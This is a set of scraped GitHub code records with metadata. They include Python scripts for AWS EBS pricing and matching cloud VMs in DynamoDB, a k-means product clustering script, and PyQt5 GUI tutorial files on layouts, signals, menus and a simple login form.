pricing_auth.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_name_map[ebs_code]}, \n {'Type': 'TERM_MATCH', 'Field': 'location', 'Value': region}])\n for result in response['PriceList']:\n json_result = json.loads(result)\n for json_result_level_1 in json_result['terms']['OnDemand'].values():\n for json_result_level_2 in json_result_level_1['priceDimensions'].values():\n for price_value in json_result_level_2['pricePerUnit'].values():\n continue\n ebs_name_map[ebs_code] = float(price_value)\n print(ebs_name_map)" }, { "alpha_fraction": 0.6125080585479736, "alphanum_fraction": 0.6150870323181152, "avg_line_length": 35.9523811340332, "blob_id": "b5cd4a35f501da5b405f66288ac579804efef400", "content_id": "12af268e787f8f8349136feac0dbadd51eb86879", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "no_license", "max_line_length": 112, "num_lines": 42, "path": "/testing+data/ebs_details.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import json\nimport boto3\n\ndef ebs_refresh():\n\n \n # this is one of the few hard coded values, if a new category is updated, this will need to change\n ebs_categories = ['Magnetic', 'General Purpose', 'Provisioned IOPS', 'Throughput Optimized HDD', 'Cold HDD']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get all ebs products\n # this block is an API call that parses the json data\n ebs_details = []\n ebs_names = []\n for ebs_type in ebs_categories:\n response = [\"NextToken\"]\n while \"NextToken\" in response:\n response = pricing_client.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}])\n\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n name = priceItemJson['product'][\"attributes\"]['volumeApiName']\n if name not in ebs_names:\n ebs_names.append(name)\n ebs_details.append(priceItemJson)\n \n # we now have data about the volumes but need to parse out and only grab that data we want for the DB\n refresh_data = []\n # get the name and attributes for each!\n for details in ebs_details:\n ebs_data = details['product']['attributes']\n ebs_data['name'] = details['product']['attributes']['volumeApiName']\n ebs_data['provider'] = 'AWS'\n ebs_data['resource type'] = 'virtual disk'\n refresh_data.append(ebs_data)\n \n\n\n\nebs_refresh()" }, { "alpha_fraction": 0.5732159614562988, "alphanum_fraction": 0.5797034502029419, "avg_line_length": 35.2689094543457, "blob_id": "5c7928f507f5a6a264add46c1d3e118f77ae8b8d", "content_id": "63a88d65f93210caaf4b827adc91bbbe5f39f058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4316, "license_type": "no_license", "max_line_length": 141, "num_lines": 119, "path": "/bluewhale_vm_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Match each GCP and Azure vm with up to 5 AWS matches. Add string set of AWS instance names to each 3rd party vm object in DynamoDB\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom boto3.dynamodb.conditions import Attr\n\n# this function can throttle DynamoDB\n# with 5 RCUs it takes about 26 minutes\n# with 250 RCUs it takes about 1.5 minutes\n\ndef match_vm(vm,t):\n # get vm specs\n vCPUs = vm['vCPUs']\n memory = vm['MemoryMB']\n type = vm['virtual machine type']\n\n # query for potential matches\n matches = t.scan(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type)\n & Attr('vCPUs').gte(vCPUs)\n # memory in range inf to (-20%)\n & Attr('MemoryMB').gte(int(float(memory) - (float(memory)*0.2)))\n )\n\n\n # edge case where AWS does not offer large enough instance in terms of vCPUs\n if not matches['Items']:\n # if this is the case, we will return the largest possible instance\n # get all of the specified type\n data = t.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type) \n )\n if not data['Items']:\n return []\n # find the highest number of vCPUs for potential match\n values = [x['vCPUs'] for x in data['Items']]\n max_vCPUs = max(values)\n\n # add all instances of this largest size to a list\n largest_matches = []\n for instance in data['Items']:\n if instance['vCPUs'] == max_vCPUs:\n largest_matches.append(instance['name'])\n \n return largest_matches\n \n # find the lowest number of vCPUs for potential match\n values = [x['vCPUs'] for x in matches['Items']]\n min_vCPUs = min(values)\n\n\n # add all instances with that many vCPUs to list\n # find the lowest amount of memory at the same time\n matched_instances = []\n potential_matches = []\n for instance in matches['Items']:\n if instance['vCPUs'] == min_vCPUs:\n potential_matches.append(instance)\n\n # we now have the instances matched by vCPUs now we need to match by memory\n\n # we are going to try to find the 5 closest instances in memory\n for i in range(0,5):\n # while we still have options\n if potential_matches:\n # find the closest instance\n closest = min(potential_matches, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest['name'])\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n \n # repeat 5x\n\n return matched_instances\n \n \ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp vm data\n third_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n \n print(\"begin matching...\")\n counter = 0\n # add in the AWS matches to each vm!\n for vm in third_party_vm['Items']:\n counter = counter + 1\n print(str(counter) + ' ' + vm['name'])\n \n matches = match_vm(vm,table)\n table.update_item(\n Key={\n 'name': vm['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': matches\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"done!\")\n return {\n 'statusCode': 200,\n 'body': json.dumps('Matching complete!')\n }\n" } ]
17
IVLIVSCAESAR44/KMeansClustering
https://github.com/IVLIVSCAESAR44/KMeansClustering
e0fc1e7124ba8037917f0b4d01b3616eec16a138
540b954363ddfdf7dcf492e460755b91dbbab494
0045dc8ab8c02341fb34cdf340ebb7ea41c071bd
refs/heads/main
2023-07-16T22:19:23.431049
2021-08-24T21:04:32
2021-08-24T21:04:32
399,601,456
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6959863305091858, "alphanum_fraction": 0.7028180956840515, "avg_line_length": 21.459999084472656, "blob_id": "83bb55b2cd55568118a7e0dda9605fee4deaa92f", "content_id": "5c5f20f51caba31613a327e57cd42c04c9816ca6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/KMeansClustering.py", "repo_name": "IVLIVSCAESAR44/KMeansClustering", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\n#import sklearn.cluster.hierarchical as hclust\r\nfrom sklearn import preprocessing\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndf = pd.read_csv(r\"File to read data from\", encoding='latin1', sep = ',')\r\n\r\n\r\nfeatures = df.drop(['ASIN', 'Product Title'], 1)\r\n\r\ndata_scaled = preprocessing.normalize(features)\r\ndata_scaled = pd.DataFrame(data_scaled, columns = features.columns)\r\n\r\ninertia = []\r\n\r\nK = range(1,10)\r\nfor k in K:\r\n kmeanmodel = KMeans(n_clusters=k).fit(data_scaled)\r\n kmeanmodel.fit(data_scaled)\r\n inertia.append(kmeanmodel.inertia_)\r\n\r\nplt.plot(K, inertia, 'bx-')\r\nplt.xlabel('K')\r\nplt.ylabel('Inertia')\r\n\r\nplt.show()\r\n\r\n\r\nkmeans = KMeans(n_clusters=4).fit(data_scaled)\r\n\r\nclustered = pd.DataFrame(kmeans.labels_)\r\nclustered.columns= ['Cluster']\r\nclustered['ASIN'] = df['ASIN'].values\r\nclustered['Product Title'] = df['Product Title'].values\r\n\r\n\r\nClusteredProducts = pd.concat((features,clustered), 1, join='inner')\r\n\r\nClusteredProducts\r\n\r\n\r\nClusteredProducts.to_csv('Name of results file', encoding='utf-8', sep=',')\r\n\r\ndel df\r\ndel features\r\ndel data_scaled\r\ndel ClusteredProducts\r\ndel clustered" } ]
1
legendaryCJT/Learining
https://github.com/legendaryCJT/Learining
39699e01501c1b48fa424722c0073328b813b9c5
73c52e7330cc065c33617675bdeb513ac7c80279
7b181a9718123d7ede8f81923dd684871e7c2772
refs/heads/master
2020-09-28T14:07:54.834316
2019-12-09T05:53:09
2019-12-09T05:53:09
226,793,908
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4947395324707031, "alphanum_fraction": 0.5232229828834534, "avg_line_length": 26.881481170654297, "blob_id": "b457a39008677732f8929a7ea4924c14688495c5", "content_id": "54c5a2af3c81218020abb75e7ad3f35a34fbdd4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3967, "license_type": "no_license", "max_line_length": 76, "num_lines": 135, "path": "/PyQt5/Layout.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\r\nfrom PyQt5.QtWidgets import QPushButton, QHBoxLayout, QVBoxLayout\r\nfrom PyQt5.QtWidgets import QGridLayout, QMessageBox\r\nfrom PyQt5.QtWidgets import QLineEdit, QTextEdit # QLineEdit无法跨行,但可以在跨行居中显示\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example_absolute(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n lbl1 = QLabel(\"Zetcode\", self)\r\n lbl1.move(15, 10)\r\n\r\n lbl2 = QLabel(\"Tutorials\", self)\r\n lbl2.move(35, 40)\r\n\r\n lbl3 = QLabel(\"for programmers\", self)\r\n lbl3.move(55, 70)\r\n\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Absolute\")\r\n self.show()\r\n\r\n\r\nclass Example_layout(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n okButton = QPushButton(\"OK\")\r\n cancelButton = QPushButton(\"Cancel\")\r\n cancelButton.clicked.connect(self.close)\r\n\r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(okButton)\r\n hbox.addWidget(cancelButton)\r\n\r\n vbox = QVBoxLayout()\r\n vbox.addStretch(1)\r\n vbox.addLayout(hbox)\r\n\r\n self.setLayout(vbox)\r\n # !!\r\n\r\n self.setGeometry(300, 300, 300, 150)\r\n self.setWindowTitle(\"Buttons\")\r\n self.show()\r\n\r\n\r\nclass Example_gridLayout(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n grid = QGridLayout()\r\n self.setLayout(grid)\r\n names = ['Cls', 'Bck', '', 'Close',\r\n '7', '8', '9', '/',\r\n '4', '5', '6', '*',\r\n '1', '2', '3', '-',\r\n '0', '.', '=', '+']\r\n positions = [(i, j) for i in range(5) for j in range(4)]\r\n for positions, name in zip(positions, names):\r\n if name == '':\r\n continue\r\n button = QPushButton(name)\r\n grid.addWidget(button, *positions)\r\n self.move(300, 150)\r\n self.setWindowTitle(\"Calculator\")\r\n self.show()\r\n\r\n\r\nclass Example_feedBack(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n title = QLabel('Title')\r\n author = QLabel('Name')\r\n review = QLabel('Review')\r\n\r\n titleEdit = QLineEdit()\r\n authorEdit = QLineEdit()\r\n reviewEdit = QTextEdit()\r\n\r\n sendButton = QPushButton(\"Send\")\r\n cancelButton = QPushButton(\"Cancel\")\r\n cancelButton.clicked.connect(self.close)\r\n # 这个使得全部窗口都退出了!!!\r\n\r\n\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n grid.addWidget(title, 1, 0)\r\n grid.addWidget(titleEdit, 1, 1, 1, 5)\r\n grid.addWidget(author, 2, 0)\r\n grid.addWidget(authorEdit, 2, 1, 1, 5)\r\n grid.addWidget(review, 3, 0)\r\n grid.addWidget(reviewEdit, 3, 1, 5, 5) # 5, 3 表示跨5行3列\r\n grid.addWidget(sendButton, 8, 4)\r\n grid.addWidget(cancelButton, 8, 5)\r\n self.setLayout(grid)\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowTitle(\"Feedback\")\r\n self.show()\r\n \r\n def closeBtn(self):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # ex1 = Example_absolute()\r\n ex2 = Example_layout()\r\n ex3 = Example_gridLayout()\r\n ex4 = Example_feedBack()\r\n sys.exit(app.exec())" }, { "alpha_fraction": 0.5885695219039917, "alphanum_fraction": 0.6026069521903992, "avg_line_length": 31.617977142333984, "blob_id": "b3048a9bfa2c26ba1e3a624ed812a9a3d064a5d2", "content_id": "e06696089ce1a4fcef5ae71b8b054b650534059d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3148, "license_type": "no_license", "max_line_length": 88, "num_lines": 89, "path": "/PyQt5/Home.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "from PyQt5.QtWidgets import (QApplication, QWidget, QPushButton, QLabel, QMessageBox,\r\n QLineEdit, QGridLayout)\r\nfrom PyQt5.QtGui import QIcon\r\nimport sys\r\n\r\n'''\r\nelf.lineEdit.setEchoMode(QLineEdit.Password) 设置密码隐藏\r\nself.lineEdit.setClearButtonEnabled(True) 设置对输入内容的删除提示\r\nself.lineEdit.setFixedSize() 总的设置控件大小\r\nself.lineEdit.setFixedWidth() 设置宽度\r\nself.lineEdit.setFixedHeight() 设置高度\r\nself.lineEdit.setFrame(False) 设置无边框\r\nself.lineEdit.text() 获得文本输入\r\nself.lineEdit.setText() 设置文本\r\nself.lineEdit.clear() 清除输入\r\nself.lineEdit.hide() 设置隐藏\r\nself.lineEdit.show() 设置展示\r\n调用QLineEdit的setPlaceholderText函数即可设置背景文字\r\n'''\r\n\r\nid = '圣雄肝帝'\r\npsw = '123456'\r\n\r\n\r\nclass LoginUI(QWidget):\r\n def __init__(self):\r\n super(LoginUI, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n idLabel = QLabel(\"ID: \", self)\r\n pswLabel = QLabel(\"Psw: \", self)\r\n\r\n self.idText = QLineEdit(self)\r\n self.idText.setPlaceholderText(\"Enter your ID\")\r\n self.pswText = QLineEdit(self)\r\n self.pswText.setPlaceholderText(\"Enter your Password\")\r\n self.pswText.setEchoMode(QLineEdit.Password)\r\n\r\n loginBtn = QPushButton(QIcon('./icon/user.png'), \"Login\", self)\r\n loginBtn.clicked.connect(self.loginTips)\r\n cancelBtn = QPushButton(\"Cancel\", self)\r\n cancelBtn.clicked.connect(self.closeBtn)\r\n\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n self.setLayout(grid)\r\n\r\n grid.addWidget(idLabel, 1, 0, 1, 1)\r\n grid.addWidget(self.idText, 1, 1, 1, 5)\r\n grid.addWidget(pswLabel, 2, 0, 1, 1)\r\n grid.addWidget(self.pswText, 2, 1, 1, 5)\r\n grid.addWidget(loginBtn, 3, 4)\r\n grid.addWidget(cancelBtn, 3, 5)\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowTitle(\"Login\")\r\n self.setWindowIcon(QIcon('./timg.jpg'))\r\n self.show()\r\n\r\n def closeEvent(self, event):\r\n reply = QMessageBox.question(self, \"Cancel\", \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\n def closeBtn(self):\r\n reply = QMessageBox.question(self, \"Cancel\", \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n # self.close()\r\n QApplication.quit()\r\n else:\r\n pass\r\n\r\n def loginTips(self):\r\n if self.idText.text() == id and self.pswText.text() == psw:\r\n QMessageBox.information(self, \"Aloha\", \"Login successfully\", QMessageBox.Ok)\r\n else:\r\n QMessageBox.information(self, \"Error\", \"Failed to login\", QMessageBox.Ok)\r\n print(self.idText.text(), self.pswText.text())\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = LoginUI()\r\n sys.exit(app.exec())\r\n" }, { "alpha_fraction": 0.5866032242774963, "alphanum_fraction": 0.6060245633125305, "avg_line_length": 26.189943313598633, "blob_id": "9704dbfcb4c92ca95ff534410efce0333f0e9ed4", "content_id": "562eda95dd1cac4084f6af281e8b20e186ae6dfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6472, "license_type": "no_license", "max_line_length": 77, "num_lines": 179, "path": "/PyQt5/Signals_and_Slots.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QVBoxLayout,\r\n QLabel, QGridLayout, QPushButton,\r\n QSlider, QLCDNumber, QStatusBar,\r\n QMainWindow)\r\nfrom PyQt5.QtCore import QObject, pyqtSignal\r\n\r\n# 新的模块: QtCore.Qt、 QtWidgets.QSlider, QtWidgets.QLCDNumber\r\n# QtCore.QObject,QtCore.pyqtSignal\r\n\r\n'''\r\n所有的应用都是事件驱动的。事件大部分都是由用户的行为产生的,\r\n当然事件也有其他的产生方式比如网络的连接,窗口管理器或者定时器等。\r\n调用应用的exec_()方法时,应用会进入主循环,主循环会监听和分发事件。\r\n\r\n在事件模型中,有三个角色:事件源、事件、事件目标\r\n事件源就是发生了状态改变的对象。事件是这个对象状态改变的内容。\r\n事件目标是事件想作用的目标。事件源绑定事件处理函数,然后作用于事件目标身上。\r\n\r\nPyQt5处理事件方面有个signal and slot机制。Signals and slots用于对象间的通讯。\r\n事件触发的时候,发生一个signal,slot是用来被Python调用的(就是相当于事件的绑定函数)\r\nslot只有在事件触发的时候才能调用。\r\n'''\r\n\r\n\r\nclass Example_SAS(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n lcd = QLCDNumber(self)\r\n sld = QSlider(Qt.Horizontal, self)\r\n\r\n vbox = QVBoxLayout()\r\n vbox.addWidget(lcd)\r\n vbox.addWidget(sld)\r\n\r\n self.setLayout(vbox)\r\n sld.valueChanged.connect(lcd.display)\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Signal and slot\")\r\n self.show()\r\n # 显示了QtGui.QLCDNumber和QtGui.QSlider模块,我们能拖动滑块让数字跟着发生改变。\r\n # sender是信号的发送者,receiver是信号的接收者,slot是对这个信号应该做出的反应。\r\n\r\n\r\nclass Example_EventHandler(QWidget):\r\n # 在PyQt5中,事件处理器经常被重写(也就是用自己的覆盖库自带的)。\r\n def __init__(self):\r\n super(Example_EventHandler, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Event handler\")\r\n self.show()\r\n\r\n def keyPressEvent(self, event):\r\n if event.key() == Qt.Key_Escape:\r\n self.close()\r\n\r\n\r\n# 这个例子中,我们替换了事件处理器函数keyPressEvent()。\r\n# 按下ESC键程序就会退出。\r\n\r\n\r\nclass Example_EventObject(QWidget):\r\n # 事件对象是用python来描述一系列的事件自身属性的对象。\r\n def __init__(self):\r\n super(Example_EventObject, self).__init__()\r\n self.text = None\r\n self.label = None\r\n self.initUI()\r\n\r\n def initUI(self):\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n x = 0\r\n y = 0\r\n\r\n self.text = \"x: {0}, y: {1}\".format(x, y)\r\n self.label = QLabel(self.text, self)\r\n\r\n grid.addWidget(self.label, 0, 0, Qt.AlignTop)\r\n self.setLayout(grid)\r\n\r\n self.setMouseTracking(True)\r\n # 事件追踪默认没有开启,当开启后才会追踪鼠标的点击事件。\r\n self.setGeometry(300, 300, 350, 200)\r\n self.setWindowTitle(\"Event object\")\r\n self.show()\r\n\r\n def mouseMoveEvent(self, event):\r\n # event代表了事件对象。里面有我们触发事件(鼠标移动)的事件对象。\r\n # x()和y()方法得到鼠标的x和y坐标点,然后拼成字符串输出到QLabel组件里。\r\n x = event.x()\r\n y = event.y()\r\n self.text = \"x: {0}, y: {1}\".format(x, y)\r\n self.label.setText(self.text)\r\n # 这个示例中,我们在一个组件里显示鼠标的X和Y坐标。\r\n # Y坐标显示在QLabel组件里\r\n\r\n\r\nclass Example_EventSender(QMainWindow):\r\n # 有时候我们会想知道是哪个组件发出了一个信号,\r\n # PyQt5里的sender()方法能搞定这件事。\r\n def __init__(self):\r\n super().__init__()\r\n # self.status_bar = self.statusBar()\r\n self.status_bar = QStatusBar(self)\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.status_bar.showMessage(\"Ready\")\r\n btn1 = QPushButton(\"Button 1\", self)\r\n btn1.move(50, 50)\r\n\r\n btn2 = QPushButton(\"Button 2\", self)\r\n btn2.move(150, 50)\r\n\r\n btn1.clicked.connect(self.buttonClicked)\r\n btn2.clicked.connect(self.buttonClicked)\r\n # buttonClicked()方法决定了是哪个按钮能调用sender()方法。\r\n # 两个按钮都和同一个slot绑定。\r\n\r\n self.setWindowTitle(\"Event sender\")\r\n self.setGeometry(300, 300, 300, 200)\r\n self.setStatusBar(self.status_bar)\r\n self.show()\r\n\r\n def buttonClicked(self):\r\n sender = self.sender()\r\n self.status_bar.showMessage(sender.text() + ' was pressed')\r\n # 用调用sender()方法的方式决定了事件源。状态栏显示了被点击的按钮。\r\n\r\n # 似乎只有QMainWindow有状态栏\r\n # 状态栏既可以通过self.StatusBar()生成并展示\r\n # 也可以通过 self.stB = QStatusBar()生成后再由self.setStatusBar(self.stB)显示(否则显示异常)\r\n\r\n\r\nclass Communicate(QObject):\r\n closeApp = pyqtSignal()\r\n\r\n\r\n# 我们创建了一个叫closeApp的信号,这个信号会在鼠标按下的时候触发\r\n# 事件与QMainWindow绑定。\r\n# Communicate类创建了一个pyqtSignal()属性的信号。\r\n\r\n\r\nclass Example_EmitSignal(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.c = Communicate()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # self.c = Communicate()\r\n self.c.closeApp.connect(self.close)\r\n # closeApp信号QMainWindow的close()方法绑定。\r\n self.setGeometry(300, 300, 300, 150)\r\n self.setWindowTitle(\"Emit signal\")\r\n self.show()\r\n\r\n def mousePressEvent(self, event):\r\n self.c.closeApp.emit()\r\n # 点击窗口的时候,发送closeApp信号,程序终止。\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # ex1 = Example_SAS()\r\n # ex2 = Example_EventHandler()\r\n # ex3 = Example_EventObject()\r\n # ex4 = Example_EventSender()\r\n ex5 = Example_EmitSignal()\r\n sys.exit(app.exec_())\r\n" }, { "alpha_fraction": 0.7714285850524902, "alphanum_fraction": 0.7714285850524902, "avg_line_length": 16.5, "blob_id": "4bfa6bc18c44c7ec544be2954fec8720dbb98384", "content_id": "3da5066157371ccb65a598744b76eebea06a9dd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/README.md", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "# Learning\nTo mark down my learing\n" }, { "alpha_fraction": 0.5661850571632385, "alphanum_fraction": 0.5720421671867371, "avg_line_length": 33.082191467285156, "blob_id": "025b8119afcf4ac191a8d9348de237f30c8f9c10", "content_id": "55348fcb260851a550d1a4743efae6b08477d4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6428, "license_type": "no_license", "max_line_length": 89, "num_lines": 146, "path": "/PyQt5/Menu_and_ToolBar.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\r\n# QMainWindow提供了主窗口的功能,使用它能创建一些简单的状态栏、工具栏和菜单栏。\r\nfrom PyQt5.QtWidgets import QAction, qApp\r\nfrom PyQt5.QtWidgets import QMenu\r\n# 子菜单中使用QMenu创建一个新菜单。\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtWidgets import QTextEdit\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.status_bar = self.statusBar()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # self.status_bar = self.statusBar()\r\n self.status_bar.showMessage(\"App Ready\")\r\n # 调用QtGui.QMainWindow类的statusBar()方法,创建状态栏。\r\n # 第一次调用创建一个状态栏,返回一个状态栏对象。\r\n # showMessage()方法在状态栏上显示一条信息。\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowIcon(QIcon('./timg.jpg'))\r\n self.setWindowTitle(\"Test\")\r\n\r\n exitAct = QAction(QIcon('./icon/exit.png'), '&Exit', self)\r\n # QAction是菜单栏、工具栏或者快捷键的动作的组合。\r\n # 先创建了一个图标、一个exit的标签和一个快捷键组合,都执行了一个动作。\r\n\r\n exitAct.setShortcut('Ctrl+Q')\r\n exitAct.setStatusTip('Exit application')\r\n # 在已有状态栏基础上,当鼠标悬停在菜单栏的时候,能改变状态栏显示当前状态。\r\n\r\n exitAct.triggered.connect(self.closeBtn)\r\n # exitAct.triggered.connect(QApplication.quit)\r\n # 这个事件跟QApplication的quit()行为相关联,上面两条语句等价?\r\n # 创建了只有一个命令的菜单file-exit,这个命令就是终止应用。\r\n # 同时也创建(不是,而是原先已有)了一个状态栏。还能使用快捷键Ctrl+Q退出应用。\r\n\r\n authorAct = QAction(QIcon('./icon/info.png'), \"Author\", self)\r\n authorAct.triggered.connect(self.authorTips)\r\n\r\n menu_bar = self.menuBar()\r\n fileMenu = menu_bar.addMenu('&File')\r\n moreMenu = menu_bar.addMenu('&More')\r\n # fileMenu.addAction(exitAct)\r\n # 创建了一个菜单栏,并在上面添加了一个file, more菜单.\r\n # file关联了点击退出应用的事件。\r\n newAct = QAction(QIcon('./icon/plus.png'), 'New', self)\r\n\r\n impMenu = QMenu('Import', self)\r\n # 这里通过QMenu创建子菜单。\r\n impAct = QAction(QIcon('./icon/book.png'), 'Import mail', self)\r\n impMenu.addAction(impAct)\r\n # 后面设置impAct的属性即可完成一定功能(点击与事件连接)。\r\n\r\n fileMenu.addAction(newAct) # newAct是QAction类,不能addMenu\r\n fileMenu.addMenu(impMenu)\r\n fileMenu.addAction(exitAct)\r\n # addAction将QAction加入主菜单。\r\n # addMenu将子菜单加入到主菜单里面。\r\n\r\n moreMenu.addAction(authorAct)\r\n\r\n viewMenu = menu_bar.addMenu(\"View\") # &View和View当名字的区别在于首字母有无下划线\r\n viewStatAct = QAction('View statusBar', self, checkable=True)\r\n viewStatAct.setStatusTip('View statusBar')\r\n viewStatAct.setChecked(True) # 默认值为勾选\r\n viewStatAct.triggered.connect(self.toggleMenu)\r\n viewMenu.addAction(viewStatAct)\r\n # 添加勾选菜单,并对其属性进行设置。\r\n\r\n textEdit = QTextEdit()\r\n self.setCentralWidget(textEdit)\r\n # 创建一个文本编辑区,并且放置于QMainWindow中间区域\r\n\r\n tool_bar = self.addToolBar(\"Exit\")\r\n tool_bar.addAction(exitAct)\r\n\r\n self.show()\r\n\r\n def authorTips(self):\r\n QMessageBox.information(self, \"AuthorInfo\", \"Author: 圣雄肝帝·猛男·CJT\\n\"\r\n \"Version: 0.0.1_beta\\n\"\r\n \"Date: 2019/12/08\\n\", QMessageBox.Ok)\r\n\r\n def toggleMenu(self, state):\r\n if state:\r\n self.status_bar.show()\r\n else:\r\n self.status_bar.hide()\r\n\r\n def contextMenuEvent(self, event):\r\n # 使用contextMenuEvent()方法实现这个菜单。\r\n\r\n cMenu = QMenu(self)\r\n # 右键菜单也叫弹出框(!?),是在某些场合下显示的一组命令。\r\n # 例如,Opera浏览器里,网页上的右键菜单里会有刷新,返回或者查看页面源代码。\r\n # 如果在工具栏上右键,会得到一个不同的用来管理工具栏的菜单。\r\n\r\n newAct = cMenu.addAction('New')\r\n openAct = cMenu.addAction('Open')\r\n quitAct = cMenu.addAction('Quit')\r\n\r\n action = cMenu.exec(self.mapToGlobal(event.pos()))\r\n # 使用exec_()方法显示菜单。从鼠标右键事件对象中获得当前坐标。\r\n # mapToGlobal()方法把当前组件的相对坐标转换为窗口(window)的绝对坐标\r\n # 如果右键菜单里触发了事件,也就触发了退出事件,执行关闭菜单行为。\r\n # 与global对应的有mapToParent\r\n if action == quitAct:\r\n qApp.quit()\r\n # self.closeEvent()\r\n\r\n # 个人体会:Menu 和 toolBar 的关系\r\n # 可以类比为浏览器中的书签收藏夹(进入里面细选)和书签栏(直接展示具体每一项)\r\n def closeEvent(self, event):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\n def 